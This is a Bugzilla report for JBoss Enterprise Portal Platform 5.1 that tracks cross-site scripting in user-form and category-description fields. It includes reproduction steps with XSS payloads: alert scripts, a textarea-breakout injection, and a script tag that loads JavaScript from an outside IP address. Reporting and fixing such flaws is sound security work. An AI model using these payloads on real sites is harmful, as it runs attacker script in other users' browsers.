Bug 793777 (JBEPP-847)

Summary: GTNPORTAL-1830 Cross Site Scripting vulnerabilities in user forms
Product: [JBoss] JBoss Enterprise Portal Platform 5 Reporter: Gary Hu <garyhu2>
Component: unspecifiedAssignee: hfnukal <hfnukal>
Status: CLOSED NEXTRELEASE QA Contact:
Severity: high Docs Contact:
Priority: high    
Version: 5.1.0.GACC: bmachado, epp-bugs, hfnukal, smumford, talee, theute
Target Milestone: ---   
Target Release: 5.1.1.DEV01   
Hardware: Unspecified   
OS: Unspecified   
URL: http://jira.jboss.org/jira/browse/JBEPP-847
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2011-07-08 08:36:18 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:

Description Gary Hu 2011-03-08 23:22:01 UTC 
Help Desk Ticket Reference: https://na7.salesforce.com/500A0000006k4Pm
project_key: JBEPP

A user can place html or javascript as their first or last name causing a viewing user to execute said code. This may happen during user modification or in other actions. Other inputs may be vulnerable as well.

To reproduce this on the EPP 5.1 out of box installation:

1) login as root
2) go to "Users and groups management"
3) under "User Management" click the "Edit User Info" icon
4) In the "First Name" or "Last Name" filed type in something like "<script>alert("hello");</script>".
5) click the "Save" button. The javascript is executed and a pop up shows up.
Comment 1 Gary Hu 2011-03-08 23:22:30 UTC 
Link: Added: This issue Cloned to GTNPORTAL-1830
Comment 2 Prabhat Jha 2011-03-09 03:36:58 UTC 
Security: Removed: Public Added: RHT+eXo
Comment 3 hfnukal@redhat.com 2011-03-23 09:36:00 UTC 
Link: Added: This issue is related to JBEPP-597
Comment 6 hfnukal@redhat.com 2011-04-19 15:27:16 UTC 
Release Notes Text: Added: Text is escaped and no script is executed.
Comment 7 Bruno Machado 2011-06-30 21:02:24 UTC 
I've received a new case about a similar issue and I tested it using epp-5.1.1.DEV01. When I type something like "<script>alert("hello");</script>" the script isn't executed. But, when I type something like "Dashboard</textarea><script>alert("Bad XSS");</script>", the script is still executed.

Ticket link: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1
Comment 8 Bruno Machado 2011-06-30 21:12:14 UTC 
Also tested the value "Dashboard</textarea><script>alert("Bad XSS");</script>" in RH03, the script was executed and "Bad XSS" message was showed.

Steps to reproduce:

1. login as root
2. Group -> Administration -> Application Registry
3. Edit Category
4. Type at the "Description" field the following:

Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js>

or

Dashboard</textarea><script>alert("Bad XSS");</script>

5. Click on Save button.
Comment 9 Thomas Heute 2011-07-08 08:36:18 UTC 
Reclose the issue.
This one was about User form, and the case that reopened it is about category description, I opened a separate Jira: JBEPP-997
Comment 10 Scott Mumford 2011-07-11 01:36:23 UTC 
Release Notes Docs Status: Added: Not Required
Release Notes Text: Removed: Text is escaped and no script is executed. Added: Included in the Release Note for JBEPP-598
Comment 11 hfnukal@redhat.com 2011-09-07 16:19:04 UTC 
Security: Removed: RHT+eXo Added: Public